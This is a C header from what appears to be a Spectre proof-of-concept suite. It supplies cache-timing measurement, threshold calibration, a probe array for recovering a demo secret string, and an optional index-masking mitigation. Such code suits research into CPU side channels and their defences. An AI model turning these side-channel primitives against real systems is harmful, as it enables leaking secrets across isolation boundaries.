/* octopus/octopus.h */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h>

/*
 * Only 32-bit and 64-bit x86 targets are accepted; any other target stops
 * the build. CACHELINE_SIZE is used further down to size and align the
 * calibration buffer.
 */
#if !defined(__i386__) && !defined(__amd64__)
        #error "unsupported architecture"
#else
        #define CACHELINE_SIZE	64
#endif

/*
 * Feature selection.
 *
 * A target that has SSE but not SSE2 gets the rdtscp, mfence and clflush
 * code paths disabled. The same NO* switches are also tested individually
 * elsewhere in this header, so they may be predefined by the build.
 */
#if defined(__SSE__) && !defined(__SSE2__)
	#define NORDTSCP
	#define NOMFENCE
	#define NOCLFLUSH
#endif

/*
 * LATENCY is the constant used by timed_access() and calibrate_threshold().
 * It is defined for every combination of the switches above, including the
 * case where NORDTSCP and NOMFENCE are both predefined on an SSE2-capable
 * target (which previously left LATENCY undefined).
 *
 * NOTE(review): the replacement text is deliberately left unparenthesised,
 * exactly as before. `x - LATENCY` therefore expands to `x - 42 + 42`
 * (i.e. `x`), while `x + LATENCY` adds the full sum. Confirm that this is
 * the intended behaviour before adding parentheses.
 */
#ifndef NORDTSCP
	#define LATENCY 42 + 42
#else
	#define LATENCY 18 + 18
#endif

#ifdef MASKING_MITIGATION
	/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
	 *
	 * array_index_mask_nospec() - generate a mask that is ~0UL when the
	 * bounds check succeeds and 0 otherwise
	 * @index: array element index
	 * @size: number of elements in array
	 *
	 * The mask is produced by two instructions and no branch (AT&T operand
	 * order): `cmp %1,%2` compares index against size and sets the carry
	 * flag exactly when index < size as unsigned values; `sbb %0,%0` then
	 * computes mask - mask - carry, leaving 0 - carry in the output register.
	 *
	 * Returns:
	 *     0 - (index < size), i.e. ~0UL when index < size and 0 otherwise
	 */
	static inline unsigned long
	array_index_mask_nospec(unsigned long index, unsigned long size)
	{
		unsigned long mask;
		/* "g" lets size be a register, memory operand or immediate;
		 * "cc" tells the compiler that the flags are modified. */
		__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
			:"=r" (mask)
			:"g"(size),"r" (index)
			:"cc");
		return mask;
	}
#endif //MASKING_MITIGATION

#ifdef NOCLFLUSH
	#define CACHE_FLUSH_ITERATIONS 	2048
	#define CACHE_FLUSH_STRIDE 	4096

	/*
	 * Scratch buffer of CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS bytes
	 * (8 MiB). It is not referenced in this header; presumably the caller
	 * walks it to evict cache lines when clflush is unavailable.
	 */
	uint8_t 	cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];

	/*
	 * flush_memory_sse() - overwrite 256 bytes at @addr with zeros using
	 * non-temporal SSE stores.
	 * @addr: start of the region; must be 16-byte aligned, as required by
	 *        _mm_stream_ps, and at least 256 bytes long
	 *
	 * Sixteen 16-byte stores are issued, covering float offsets 0, 4, ..., 60.
	 * The contents of the region are destroyed (set to 0.0f).
	 */
	void
	flush_memory_sse(uint8_t * addr)
	{
		float*	p = (float *)addr;
		float 	c = 0.f;
		__m128 i = _mm_setr_ps(c, c, c, c);

		int k, l;
		/* Non-sequential memory addressing by looping through k by l */
		for (k = 0; k < 4; k++)
			for (l = 0; l < 4; l++)
				_mm_stream_ps(&p[(l * 4 + k) * 4], i);
	}
#endif //NOCLFLUSH

/* Distance in bytes between consecutive slots of channel[]; the probe loop
 * in __OCTOPUS_TIMINGS__ addresses slot v as channel[v * GAP]. */
#define GAP 512

/* Demo string; not referenced anywhere else in this header. */
char* 		secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
/* cache_hit_threshold: largest timed_access() result still counted as a
 * cache hit; zero-initialised here, set by -t in __OCTOPUS_ARGS__.
 * array1_size: 16, equal to the number of explicit initialisers in array1[]
 * and used as the modulus when indexing it in __OCTOPUS_TIMINGS__. */
unsigned int 	cache_hit_threshold, array1_size = 16;
/* array1 has 160 bytes; the first 16 hold 1..16 and the rest are zero.
 * unused1/unused2 are not referenced in this header -- presumably padding
 * around array1; TODO confirm against the users of this header. */
uint8_t 	unused1[64], unused2[64], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
/* One GAP-sized slot per possible byte value (256 slots). */
uint8_t 	channel[256 * GAP]; // side channel to extract secret phrase

/*
 * __OCTOPUS_ARGS__ - command-line parsing fragment.
 *
 * Must be expanded inside a function that returns int and has `argc`,
 * `argv`, an int `o` and an integer counter `json` in scope.
 *
 *   -t INT  store INT in cache_hit_threshold. INT must be a complete,
 *           non-negative decimal number that fits in unsigned int;
 *           anything else is treated as a usage error (atoi() used to
 *           accept such input silently).
 *   -j      increment json.
 *
 * An unknown option, a bad -t value or any leftover non-option argument
 * prints the usage text to stderr and returns 1 from the enclosing function.
 * getopt() is compared with -1, the end-of-options value POSIX specifies.
 */
#define __OCTOPUS_ARGS__\
	while ((o = getopt(argc, argv, "t:j")) != -1) {\
		switch (o) {\
			case 't': {\
				char *octopus_end_ = NULL;\
				long octopus_val_ = strtol(optarg, &octopus_end_, 10);\
				if (octopus_end_ == optarg || *octopus_end_ != '\0' ||\
				    octopus_val_ < 0 ||\
				    (unsigned long)octopus_val_ > (unsigned int)-1) {\
					goto usage;\
				}\
				cache_hit_threshold = (unsigned int)octopus_val_;\
				break;\
			}\
			case 'j':\
				json++;\
				break;\
			default:\
			usage:\
				fprintf(stderr, "usage: %s [-j] "\
				"[-t threshold]\n"\
				"\t-j\t\tJSON output\n"\
				"\t-t INT\t\tfixed threshold\n", argv[0]);\
				return 1;\
		}\
	}\
	if (argc != optind) {\
		goto usage;\
	}

/*
 * __OCTOPUS_TIMINGS__ - probe-and-score fragment.
 *
 * Must be expanded inside a loop or switch (it ends in a `break`) with `i`,
 * `j`, `mix_i`, `addr`, `results[]` and `tries` in scope.
 *
 * 1. Visits all 256 slots of channel[] in the permuted order
 *    mix_i = (i * 167 + 13) & 255 (a permutation of 0..255 because 167 is
 *    odd) and times one read of each slot with timed_access().
 * 2. A slot scores a point in results[mix_i] when its time is at most
 *    cache_hit_threshold and mix_i differs from array1[tries % array1_size].
 * 3. Sets j to the index of the highest score; because the comparison is
 *    `>=`, ties resolve to the highest index.
 * 4. Executes `break` once results[j] has reached 3.
 */
#define __OCTOPUS_TIMINGS__\
		/* Time reads. Order is lightly mixed up to prevent stride prediction */\
		for (i = 0; i < 256; i++) {\
			mix_i = ((i * 167) + 13) & 255;\
			addr = & channel[mix_i * GAP];\
			if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {\
				results[mix_i]++; /* cache hit - add +1 to score for this value */\
			}\
		}\
		/* Locate highest results in j */\
		j = -1;\
		for (i = 0; i < 256; i++) {\
			if (j < 0 || results[i] >= results[j]) {\
				j = i;\
			}\
		}\
		if (results[j] >= 3) {\
			break;\
		}

/*
 * __OCTOPUS_NOCLFLUSH_INIT__ - declares the locals `l` (uninitialised int)
 * and `junk2` (int, set to 0) at the expansion site. The void-cast counts
 * as a use of junk2, presumably to keep unused-variable warnings quiet.
 */
#define __OCTOPUS_NOCLFLUSH_INIT__\
		int l, junk2 = 0;\
		(void)junk2;

/*
 * __OCTOPUS_MFENCE__ - expands to a complete `_mm_mfence();` statement, or
 * to nothing when NOMFENCE is defined.
 *
 * The choice has to be made around the #define: preprocessor directives
 * placed inside a macro's replacement list are never executed, they are
 * emitted as stray `#` tokens and break the build at the expansion site.
 */
#ifndef NOMFENCE
	#define __OCTOPUS_MFENCE__ _mm_mfence();
#else
	#define __OCTOPUS_MFENCE__
#endif

/*
 * timed_access() - time one single-byte read from @addr.
 * @addr: byte to read; volatile, so the load is always performed
 *
 * Takes a timestamp before and after the load, using whichever method the
 * NORDTSCP / NOMFENCE switches select:
 *   - rdtscp around the load (default),
 *   - rdtsc with mfence barriers (NORDTSCP only),
 *   - plain rdtsc (NORDTSCP and NOMFENCE).
 *
 * Returns the timestamp difference truncated to unsigned.
 *
 * NOTE(review): LATENCY is defined in this header as an unparenthesised sum
 * (`42 + 42` or `18 + 18`), so `t1 - t0 - LATENCY` expands to
 * `t1 - t0 - 42 + 42` and no latency is actually subtracted. Left untouched
 * because the thresholds are tuned against this behaviour -- confirm intent.
 */
static inline unsigned
timed_access(volatile uint8_t *addr)
{
	uint64_t	t0, t1;
	/* Sink for the loaded byte and for rdtscp's auxiliary output. It is
	 * zero-initialised rather than self-initialised, so no indeterminate
	 * value is read and no diagnostic pragma is needed. */
	unsigned int	junk = 0;

	#ifndef NORDTSCP
		t0 = __rdtscp(& junk);
		junk |= *addr;
		t1 = __rdtscp(& junk);
	#else
		#ifndef NOMFENCE
			/*
			Since the rdtsc instruction isn't serialized, newer processors will try to
			reorder it, ruining its value as a timing mechanism.
			To get around this, we use the mfence instruction to introduce a memory
			barrier and force serialization. mfence is used because it is portable across
			Intel and AMD.
			*/
			_mm_mfence();
			t0 = __rdtsc();
			_mm_mfence();
			junk = *addr;
			_mm_mfence();
			t1 = __rdtsc();
			_mm_mfence();
		#else
			/*
			The mfence instruction was introduced with the SSE2 instruction set, so
			we have to ifdef it out on pre-SSE2 processors.
			Luckily, these older processors don't seem to reorder the rdtsc instruction,
			so not having mfence on older processors is less of an issue.
			*/
			t0 = __rdtsc();
			junk |= *addr;
			t1 = __rdtsc();
		#endif // NOMFENCE
	#endif // NORDTSCP
	(void)junk; /* the value itself is never needed */
	return (unsigned)(t1 - t0 - LATENCY);
}

/*
 * calibrate_threshold() - derive a threshold from the measured time of
 * repeated reads of one local, cache-line-aligned byte.
 * @threshold: receives the result; may be NULL, in which case the
 *             measurement is still taken but nothing is stored
 *
 * The byte is read once before measuring, then timed_access() is called
 * 10000 times on it. The stored value is the integer average of those
 * timings plus LATENCY.
 */
static void
calibrate_threshold(unsigned int *threshold)
{
	enum { SAMPLES = 10000 };
	volatile char		probe[2 * CACHELINE_SIZE];
	volatile uint8_t*	line;
	uint64_t 		total = 0;
	int			n;
	__attribute__((unused))
	volatile int 		warm = 0;

	/* Round up to the next CACHELINE_SIZE boundary; it always falls inside
	 * probe[] because the buffer spans two cache lines. */
	line = ((volatile void *)(((unsigned long)(probe) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1)));

	/* Touch the byte once before timing it. */
	warm |= *line;

	for (n = 0; n < SAMPLES; n++)
		total += timed_access(line);

	if (threshold == NULL)
		return;

	*threshold = total / SAMPLES + LATENCY;
}